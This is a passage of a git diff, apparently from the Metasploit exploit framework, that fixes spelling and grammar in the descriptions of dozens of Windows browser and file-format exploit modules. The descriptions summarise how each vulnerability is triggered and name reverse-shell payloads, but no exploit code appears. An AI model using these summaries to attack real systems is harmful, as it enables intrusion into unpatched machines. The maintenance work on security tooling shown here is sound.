DocumentViewerImpl object, triggered via a specially crafted web page using onreadystatechange events and the window.stop() API, as exploited in the wild on 2013 August to target Tor Browser users. }, diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index ec1a36d4ca..8bc99387b1 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability', 'Description' => %q{ - This module exploits an use after free vulnerability in Mozilla + This module exploits a use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs diff --git a/modules/exploits/windows/browser/mozilla_reduceright.rb b/modules/exploits/windows/browser/mozilla_reduceright.rb index b188ee7c30..f92acefe8c 100644 --- a/modules/exploits/windows/browser/mozilla_reduceright.rb +++ b/modules/exploits/windows/browser/mozilla_reduceright.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method - may cause an invalid index being used, allowing abitrary remote code execution. + may cause an invalid index being used, allowing arbitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine. }, diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index 25823ada7f..98d1d0c40f 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'MS06-013 Microsoft Internet Explorer createTextRange() Code Execution', 'Description' => %q{ This module exploits a code execution vulnerability in Microsoft Internet Explorer. - Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under + Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index c969b4089c..a4dc6b147a 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling', 'Description' => %q{ This module exploits a code execution vulnerability in Microsoft XML Core Services which - exists in the XMLHTTP ActiveX control. This module is the modifed version of + exists in the XMLHTTP ActiveX control. This module is the modified version of http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft XML Core Services 4.0 SP2. diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index 9b09042ab7..6a1c791976 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution vulnerability that occurs when a user presses F1 on MessageBox originated from VBscript within a web page. When the - user hits F1, the MessageBox help functionaility will attempt to load and use + user hits F1, the MessageBox help functionality will attempt to load and use a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server. This particular version of the exploit implements a WebDAV server that will diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index 7d447ee93a..3ec12c8e73 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow', 'Description' => %q{ - This module exploits a buffer overlow in l3codecx.ax while processing a + This module exploits a buffer overflow in l3codecx.ax while processing a AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite with 0's so the three least significant bytes of EIP saved on stack are overwritten and shellcode is mapped using the .NET DLL memory technique pioneered diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index a96c5f910a..6551fe2303 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -22,12 +22,12 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption', 'Description' => %q{ - Thie module exploits a memory corruption vulnerability within Microsoft's + This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead arbitrary code execution. - It seems like Microsoft code inadvertantly increments a vtable pointer to + It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable's function pointers. This leads to the program counter being set to the address determined by the address "[vtable+0x30+1]". The particular address depends on the exact diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb index 45d354cd13..58eadf8626 100644 --- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb +++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb @@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote handler we want to abuse - the "onpropertychange" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in "onselect", this will trigger "onpropertychange". During "onpropertychange" event handling, a free of the CDisplayPointer - object can be forced by using an "Unslect" (other approaches also apply), but a reference + object can be forced by using an "Unselect" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index 5437ecd04b..87c8d9aa20 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004. - By sending a overly long string to the "Get()" method, an attacker may be + By sending an overly long string to the "Get()" method, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb index 389505434c..804fabe0b5 100644 --- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "IBM Lotus Notes Client URL Handler Command Injection", 'Description' => %q{ - This modules exploits a command injection vulnerability in the URL handler for + This module exploits a command injection vulnerability in the URL handler for for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with - an specially crafted notes:// URL to execute arbitrary commands with also arbitrary + a specially crafted notes:// URL to execute arbitrary commands with also arbitrary arguments. This module has been tested successfully on Windows XP SP3 with IE8, Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2. }, diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb index d7a91b525c..2adb7c4dab 100644 --- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb +++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0). Oracle Document Capture 10g comes bundled with a third party ActiveX control - emsmtp.dll (6.0.1.0). When passing a overly long string to the method "SubmitToExpress" + emsmtp.dll (6.0.1.0). When passing an overly long string to the method "SubmitToExpress" an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb index 19a2661d0a..4387bd2a45 100644 --- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution", 'Description' => %q{ - This modules exploits a vulnerability found in the Oracle WebCenter Content + This module exploits a vulnerability found in the Oracle WebCenter Content CheckOutAndOpenControl ActiveX. This vulnerability exists in openWebdav(), where user controlled input is used to call ShellExecuteExW(). This module abuses the control to execute an arbitrary HTA from a remote location. This module has been diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb index fc899f2e19..fb28a1c92e 100644 --- a/modules/exploits/windows/browser/orbit_connecting.rb +++ b/modules/exploits/windows/browser/orbit_connecting.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Orbit Downloader Connecting Log Creation Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Orbit Downloader 2.8.4. When an - attacker serves up a malicious web site, abritrary code may be executed. + attacker serves up a malicious web site, arbitrary code may be executed. The PAYLOAD windows/shell_bind_tcp works best. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/real_arcade_installerdlg.rb b/modules/exploits/windows/browser/real_arcade_installerdlg.rb index 2032f3d6d2..f60e1ed4f9 100644 --- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb +++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution', 'Description' => %q{ - This module exploits a vulnerability in Real Networks Acrade Game's ActiveX control. The "exec" + This module exploits a vulnerability in Real Networks Arcade Game's ActiveX control. The "exec" function found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands on the victim machine. }, diff --git a/modules/exploits/windows/browser/realplayer_cdda_uri.rb b/modules/exploits/windows/browser/realplayer_cdda_uri.rb index 668b8d9873..45aa9c8c94 100644 --- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb +++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'RealNetworks RealPlayer CDDA URI Initialization Vulnerability', 'Description' => %q{ - This module exploits a initialization flaw within RealPlayer 11/11.1 and + This module exploits an initialization flaw within RealPlayer 11/11.1 and RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object initialization failure. However, this failure is improperly handled and uninitialized memory executed. diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index 83a3be2b05..47e00c37e7 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module - has been tested on Safari and Maxthon. Code execution can be acheived by first + has been tested on Safari and Maxthon. Code execution can be achieved by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS. }, diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index aac0992ff7..fd67c1afa1 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb @@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info(info, 'Name' => 'TeeChart Professional ActiveX Control Trusted Integer Dereference', 'Description' => %q{ - This module exploits a integer overflow in TeeChart Pro ActiveX control. When + This module exploits an integer overflow in TeeChart Pro ActiveX control. When sending an overly large/negative integer value to the AddSeries() property of - TeeChart2010.ocx, the code will perform an arithemetic operation that wraps the + TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the value and is later directly trusted and called upon. This module has been designed to bypass DEP only under IE8 with Java support. Multiple diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index c8acda7aa9..8dbb835630 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect initialization under Internet Explorer. - While the Tom Sawyer GET Extension Factory is installed with some versions of VMware + While the Tom Sawyer GET Extension Factory is installed with some versions of VMware Infrastructure Client, this module has been tested only with the versions installed with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX control tested is tsgetx71ex553.dll, version 5.5.3.238. diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index 16b9b36426..74fb2ee7ef 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject - ActiveX Control. If an long string is passed to the 'NewObject' method, a stack- + ActiveX Control. If a long string is passed to the 'NewObject' method, a stack- based buffer overflow will occur when copying attacker-supplied data using the sprintf function. diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index d3496d898d..4efaa2d865 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Winamp Playlist UNC Path Computer Name Overflow', 'Description' => %q{ This module exploits a vulnerability in the Winamp media player. - This flaw is triggered when a audio file path is specified, inside a + This flaw is triggered when an audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12. diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index b556a58675..e823d18b73 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in Winamp 5.24. By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be - exploited from the browser or the winamp client itself. + exploited from the browser or the Winamp client itself. }, 'Author' => 'MC', 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index be93a9c190..f17e6e490b 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX - control in InterVideo WinDVD 7. By sending a overly long string + control in InterVideo WinDVD 7. By sending an overly long string to the "ApplicationType()" property, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 0b884daf6c..b69c9f884d 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote opt-in to ASLR. As such, this module should be reliable on all Windows versions. - The WMI Adminsitrative Tools are a standalone download & install (linked in the + The WMI Administrative Tools are a standalone download & install (linked in the references). }, diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb index 21d8c4da32..83de2ea8fa 100644 --- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb +++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the - X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun + X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 25b3d6da7b..dacbde4f95 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX - Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string + Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string to the "fvCom()" method from a yahoo.com domain, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 69a61dcbd4..f4f5de1970 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. - By sending a overly long string to the "Server()" method, and then calling + By sending an overly long string to the "Server()" method, and then calling the "Send()" method, an attacker may be able to execute arbitrary code. Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp" yield for the best results. diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index b83e93a2a8..82bbcc2541 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -24,9 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These - files can be local files, but also file stored remotely for example on a file share. - Exploitation is limited by the fact that its is not possible for attackers to supply - command line options. + files can be local files, but also files stored remotely (on a file share, for example) + can be used. Exploitation is limited by the fact that it is not possible for attackers + to supply command line options. }, 'Author' => 'Yorick Koster ', 'References' => diff --git a/modules/exploits/windows/fileformat/abbs_amp_lst.rb b/modules/exploits/windows/fileformat/abbs_amp_lst.rb index 49b79010d8..1fa5321339 100644 --- a/modules/exploits/windows/fileformat/abbs_amp_lst.rb +++ b/modules/exploits/windows/fileformat/abbs_amp_lst.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges - of the user running the application . This module has been tested successfully on + of the user running the application. This module has been tested successfully on ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index 80a28ed8a2..643d6b5656 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various - Windows versions due a the hardcoded syscall number. + Windows versions due to a hardcoded syscall number. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index f5ecab3566..b411f7b954 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Adobe Reader ToolButton Use After Free', 'Description' => %q{ - This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 + This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully diff --git a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb index 1298adb9f4..c2f2504e2a 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", 'Description' => %q{ - This module exploits a vulnerability found in Apple Quicktime. The flaw is - triggered when Quicktime fails to properly handle the data length for certain + This module exploits a vulnerability found in Apple QuickTime. The flaw is + triggered when QuickTime fails to properly handle the data length for certain atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer overflow by loading a specially crafted .mov file, and allows arbitrary code execution under the context of the current user. Please note: Since an egghunter diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index bf1e3297e4..7e03983186 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Audiotran. + PLS file within a browser, when the PLS extension is registered to Audiotran. This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb index 597b63d501..2fca6c6c67 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4. An attacker must send the file to victim and the victim must open the file. Alternatively, it may be possible to execute code remotely via an embedded - PLS file within a browser when the PLS extention is registered to Audiotran. + PLS file within a browser when the PLS extension is registered to Audiotran. This alternate vector has not been tested and cannot be exercised directly with this module. }, diff --git a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb index c5c522c35b..7d466420ce 100644 --- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb +++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in Aviosoft Digital TV Player Pro version 1.x. An overflow occurs when the process copies the content of a - playlist file on to the stack, which may result aribitrary code execution under + playlist file on to the stack, which may result arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index d77b63f7a7..bc24157d7b 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit 'Name' => "Beetel Connection Manager NetConfig.ini Buffer Overflow", 'Description' => %q{ This module exploits a stack-based buffer overflow on Beetel Connection Manager. The - vulnerability exists in the parising of the UserName parameter in the NetConfig.ini + vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP SP3 and Windows 7 SP1. }, diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index 86a0680b7f..f4df94d914 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CA Antivirus Engine CAB Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637. - By creating a specially crafted CAB file, an an attacker may be able + By creating a specially crafted CAB file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb index e6e068b02b..f9c0f711cd 100644 --- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening a m3u playlist with a long track name, a SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an - invalid read of an injectible address, thus allowing arbitrary code execution. + invalid read of an injectable address, thus allowing arbitrary code execution. This module works on multiple Windows platforms including: Windows XP SP3, Windows Vista, and Windows 7. }, diff --git a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb index c81f162437..2ce52112f9 100644 --- a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb +++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a buffer overflow vulnerability found in Chasys Draw IES (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while parsing BMP files, where the ReadFile function is used to store user provided data - on the stack in a insecure way. It results in arbitrary code execution under the + on the stack in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted BMP file. This module has been tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index 2ec583c7b7..cb33d3ef1d 100644 --- a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb +++ b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set - in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass + in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. }, diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index a6191aa48b..fe3d7691d4 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - DBR file within a browser, since the DBR extention is registered to DeepBurner. + DBR file within a browser, since the DBR extension is registered to DeepBurner. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb index 0bd6a579a2..3b14db3dd2 100644 --- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb +++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow on DVD X Player 5.5 Pro and Standard. By supplying a long string of data in a plf file (playlist), the MediaPlayerCtrl.dll component will attempt to extract 